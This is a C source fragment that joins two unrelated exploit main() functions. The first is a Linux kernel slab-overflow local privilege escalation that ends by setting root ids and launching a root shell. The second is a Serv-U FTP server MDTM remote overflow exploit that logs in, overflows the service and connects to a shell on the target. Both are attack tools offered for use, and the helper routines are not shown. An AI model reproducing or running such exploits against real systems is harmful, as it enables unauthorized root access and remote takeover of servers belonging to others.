int main(int argc, char ** argv) { int i, nbfiles; int * files; char tmpfile[100]; get_kernel_syms(); files = malloc(sizeof(int)); //check_slabs(); /* Spray slab with file structs */ for (i=0;;i++) { sprintf(tmpfile, "/tmp/tmpfile%d", i); files = realloc(files, (i+1)*sizeof(int)); if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0) break; } //check_slabs(); printf("[+] Created %d files\n", nbfiles = i); /* We cannot check slab info * so may not be properly aligned * (should work with argv[1] = 3) */ for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) { close(files[nbfiles-4-i]); } do_overflow(); for (i=0;i<nbfiles;i++) write(files[i], "YOUPI", 5); for (i=0;i<nbfiles;i++) close(files[i]); if (setresuid(0, 0, 0)) { printf("[-] Exploit failed :(\n"); exit(1); } setresgid(0, 0, 0); printf("[+] Launching root shell!\n"); execl("/bin/sh", "/bin/sh", NULL); return 1; }
int main (int c, char *v[]) { int ch, fd, sd; char *hostName = NULL, *userName = "******", *passWord = "******"; shellport = port; fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n" "bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n"); if (c < 2) { showHELP (v[0]); exit (1); } while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) { switch(ch) { case 'h': hostName = optarg; break; case 't': x = atoi (optarg); if (x > MAX_NUM) { printf ("[-] wtf your input?\n"); exit (-1); } break; case 'u': userName = optarg; break; case 'p': passWord = optarg; break; case 'P': port = atoi (optarg); break; case 'd': shellport = atoi (optarg); break; default: showHELP (v[0]); return 0; } } fd = ftp_login (hostName, port, userName, passWord); if (fd <= 0) { printf ("[-] can't connnect\n"); exit (-1); } do_overflow (fd); close (fd); sleep (3); sd = new_tcpConnect (hostName, shellport, 3000); if (sd <= 0) { printf ("[-] failed\n"); return -1; } fprintf (stderr, "[+] successed!!\n\n\n"); sh (0, 1, sd); close (sd); return 0; }